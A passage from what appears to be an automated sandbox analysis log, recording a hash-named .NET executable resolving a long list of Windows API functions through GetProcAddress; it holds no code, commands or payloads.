\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter IsAppThemed (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter IsAppThemedW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateActCtx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateActCtxA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessage (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WideCharToMultiByte (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ProcessIdToSessionId (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmCreateContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmDestroyContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AdjustWindowRectEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DuplicateHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentActCtx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DefWindowProcW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterClass (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateWindowEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetWindowLong (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetWindowLong (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetWindowLongW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CallWindowProc (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CallWindowProcW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetClientRect (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetWindowRect (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetParent (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleDC (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLCID (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLCIDW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetObject (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetObjectW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetDC (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdiplusStartup (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter IsProcessorFeaturePresent (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetWindowInfo (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetAncestor (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ExtTextOutW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipCreateFontFromLogfontW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ND_RI2 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ND_RI2_RetAddr (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called 